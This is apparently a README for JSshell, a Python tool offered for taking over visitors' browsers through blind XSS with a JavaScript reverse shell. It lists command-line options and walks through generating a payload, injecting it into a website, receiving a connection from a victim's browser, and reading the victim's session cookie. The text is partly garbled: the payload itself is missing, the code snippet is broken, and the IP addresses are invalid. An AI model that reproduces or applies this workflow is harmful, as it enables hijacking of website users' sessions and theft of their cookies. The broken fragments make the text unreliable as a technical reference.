JSshell - a JavaScript reverse shell. This is used for executing JS code remotely, exploiting blind XSS, ...
Requirements: Any OS + Python 2 or Python 3
Updated in the new version of JShell 3.1:
- New JSshell command:
-> allows to write a snippet of javascript code
>>> snippet
Use CTRL+D to finish the snippet
function new() {
new = 'New update: Support javascript snippet =)';
- Quiet mode (for professionals)
- Added
reverse shell payload - Fixed some bugs
Set timeout for shell connection (if the user exits the session, the shell will be paused forever, so if your set the timeout, the shell will be closed after exceeds the timeout): -w
jsh.py -g
jsh.py -p 1234
jsh.py -s 48.586.1.23 -g
jsh.py -c "alert(document.cookie)" -w 10
This is a step-by-step example of how to use JSshell.
First, we need to generate a reverse JS shell payload and set the shell timeout (e.g. 20 seconds):
~# whoami
~# ls
README.md jsh.py
~# python3 jsh.py -g -w 20
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
Listening on [any] 4848 for incoming JS shell ...
Now paste this payload to the website:
Access the page and we will have the reverse JS shell:
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help This help
exit, quit Exit the JS shell
Let execute some commands:
$ var test = 'controlled'
$ confirm(test)
And an alert will be popped up: controlled
$ prompt(document.cookie)
And the browser will print the user cookies: JSESSION=3bda8...
$ exit
~# whoami
~# pwd
Now quited!
This is created by shelld3v!